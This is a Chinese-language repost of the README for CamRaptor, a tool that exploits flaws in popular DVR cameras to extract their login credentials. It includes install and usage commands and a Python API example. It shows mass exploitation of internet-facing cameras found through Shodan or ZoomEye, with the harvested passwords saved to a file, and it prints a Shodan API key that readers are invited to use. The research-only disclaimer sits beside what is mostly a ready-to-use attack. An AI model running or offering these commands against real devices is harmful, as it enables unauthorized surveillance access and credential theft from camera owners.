CamRaptor
CamRaptor 是一种工具,它利用流行的 DVR 摄像机中的多个漏洞来获取网络摄像机凭据。
特征
-
利用大多数常用相机型号(如 和 )中的漏洞。
Novo
CeNova
QSee
-
经过优化,可在启用线程的情况下同时利用列表中的多个摄像机。
-
简单的 CLI 和 API 用法。
安装
pip3 install git+https://github.com/EntySec/CamRaptor
基本用法
要使用CamRaptor,只需输入您的终端。camraptor
usage: camraptor [-h] [-t] [-o OUTPUT] [-i INPUT] [-a ADDRESS]
[--shodan SHODAN] [--zoomeye ZOOMEYE] [-p PAGES]
CamRaptor is a tool that exploits several vulnerabilities in popular DVR
cameras to obtain network camera credentials.
optional arguments:
-h, --help show this help message and exit
-t, --threads Use threads for fastest work.
-o OUTPUT, --output OUTPUT
Output result to file.
-i INPUT, --input INPUT
Input file of addresses.
-a ADDRESS, --address ADDRESS
Single address.
--shodan SHODAN Shodan API key for exploiting devices over Internet.
--zoomeye ZOOMEYE ZoomEye API key for exploiting devices over Internet.
-p PAGES, --pages PAGES
Number of pages you want to get from ZoomEye.
例子
利用单个摄像头
让我们破解我的相机只是为了好玩。
camraptor -a 192.168.99.100
利用互联网上的相机
让我们尝试使用Shodan搜索引擎通过互联网利用相机,我们将使用它进行快速利用。-t
camraptor -t --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD
注意:鉴于Shodan API密钥()是我的PRO API密钥,您可以使用此密钥或您自己的密钥,可以免费使用我们所有的资源:)PSKINdQe1GyxGgecYz2191H2JoS9qvgD
利用输入文件中的摄像机
让我们尝试使用打开的相机数据库来快速利用。-t
camraptor -t -i cameras.txt -o passwords.txt
注意:它将按地址利用列表中的所有摄像机,并将所有获得的密码保存到 。cameras.txt
passwords.txt
接口用法
CamRaptor也有他们自己的Python API,可以通过将CamRaptor导入你的代码来调用。
from camraptor import CamRaptor
基本功能
有所有CamRaptor的基本功能可用于利用指定的相机。
-
exploit(address)
- 通过给定地址利用单个摄像头。
例子
利用单个摄像头
from camraptor import CamRaptor
camraptor = CamRaptor()
creds = camraptor.exploit('192.168.99.100')print(creds)
项目地址:
https://github.com/EntySec/CamRaptor
原文始发于微信公众号(蓝猫Sec):CamRaptor--利用流行的 DVR 摄像机中的多个漏洞来获取网络摄像机凭据
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论